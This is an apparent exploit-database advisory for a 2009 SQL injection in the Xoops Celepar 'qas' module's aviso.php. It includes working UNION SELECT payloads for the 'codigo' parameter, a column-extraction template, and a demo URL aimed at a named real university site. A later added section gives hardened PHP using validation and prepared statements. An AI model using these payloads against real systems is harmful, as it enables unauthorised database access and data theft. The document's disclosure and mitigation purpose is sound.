Vendor: Celepar Module Qas
By: s4r4d0
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Celepar Module Qas
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Xoops Celepar Module Qas

A SQL injection vulnerability has been found in the Quas module of Xoops Celepar, in the file Aviso.php. The vulnerable code is: $codigo = $_POST['codigo']; else $codigo = $_GET['codigo']; The 'codigo' value is taken from the request without any validation, so an attacker can exploit the vulnerability by sending malicious SQL in the 'codigo' parameter of the URL. Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--

Mitigation:

Input validation should be used to prevent SQL Injection attacks.
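As an added example (not code from the advisory or from the Xoops Celepar project), the PHP below shows how the 'codigo' handling described above can be hardened: the request value is validated as an integer and then bound as a prepared-statement parameter, so it can no longer alter the query. The table name avisos, the columns codigo, titulo and texto, the PDO connection in $pdo, the function names and the positive-id range are all assumptions; the advisory does not show the query that consumes $codigo.

```php
<?php
// Added example, not code from the advisory or the Xoops Celepar project.
// Assumed names: table `avisos`, columns `codigo`, `titulo`, `texto`, and a
// PDO connection in $pdo. The advisory does not show the query that uses $codigo.

declare(strict_types=1);

/**
 * Validate the 'codigo' request value as a positive integer identifier.
 * Returns the integer, or null when the value is absent or not a plain integer.
 * The positive-range restriction is an assumption about how ids are assigned.
 */
function validarCodigo(array $post, array $get): ?int
{
    // Same POST-then-GET precedence as the advisory's excerpt.
    $raw = $post['codigo'] ?? $get['codigo'] ?? null;
    if (!is_string($raw) && !is_int($raw)) {
        return null; // arrays (codigo[]=...) and missing values are rejected
    }
    // FILTER_VALIDATE_INT accepts only a plain integer; anything with SQL
    // keywords, quotes or comment markers fails validation.
    $codigo = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $codigo === false ? null : $codigo;
}

/**
 * Hardened lookup: the validated integer is bound as a prepared-statement
 * parameter, so the request value can never change the SQL structure.
 */
function buscarAviso(PDO $pdo, array $post, array $get): ?array
{
    $codigo = validarCodigo($post, $get);
    if ($codigo === null) {
        http_response_code(400); // reject the request instead of querying
        return null;
    }
    $stmt = $pdo->prepare('SELECT codigo, titulo, texto FROM avisos WHERE codigo = :codigo');
    $stmt->bindValue(':codigo', $codigo, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-check with constructed inputs (no database needed): a normal id passes,
// the advisory's demo value is rejected before any query is built.
assert(validarCodigo([], ['codigo' => '42']) === 42);
assert(validarCodigo([], ['codigo' => '-1 UNION SELECT 1,2,3,4,5,6,7,8--']) === null);
assert(validarCodigo(['codigo' => '7'], ['codigo' => '-1']) === 7);

// In the page handler: $row = buscarAviso($pdo, $_POST, $_GET);
```

The validation step and the prepared statement are independent defences: the prepared statement alone already prevents the injection, and the integer check additionally rejects malformed requests early with a 400 so they never reach the database. With the MySQL PDO driver, setting PDO::ATTR_EMULATE_PREPARES to false makes the server itself handle the parameter binding rather than the client-side emulation.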

Exploit-DB raw data:

**********************************************************************************************************
Xoops Celepar Module Qas
Download of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
mail: s4r4d0@yahoo.com
**********************************************************************************************************
A SQL Injection has been found on modules Quas of Xoops Celepar in file Aviso.php.
Source code:
    }
    $codigo = $_POST['codigo'];
} else
    $codigo = $_GET['codigo'];
***********************************************************************************************************
Target: site.com.br/modules/qas/aviso.php?codigo=
SQL Code: -1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename
Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
***********************************************************************************************************
[ Fatal Error Group Br ]
[Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer  - M0nt3r - Vympel]
[From Brazil]
************************************************************************************************************

# milw0rm.com [2009-07-24]